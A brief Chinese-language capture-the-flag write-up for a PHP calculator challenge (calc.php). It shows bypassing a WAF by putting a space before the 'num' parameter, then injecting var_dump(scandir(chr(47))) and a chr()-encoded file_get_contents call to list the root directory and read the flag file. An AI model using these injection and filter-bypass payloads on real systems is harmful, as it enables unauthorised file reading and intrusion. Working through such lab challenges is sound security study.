打开题目
用F12查看源码,发现了一个calc.php文件和WAF
打开calc.php文件
发现waf的过滤规则,先试下num输出phpinfo
发现不能访问,waf拦截了num,发现利用空格绕过,php在解析时会去掉前面空格解析
前面使用isset()检测变量是否设置,直接使用var_dump来输出isset()返回值
扫描下目录%20num=var_dump(scandir(chr(47))),要对/进行ascii。绕过waf
发现f1agg文件,直接利用file_get_contents读取文件
var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
得到flag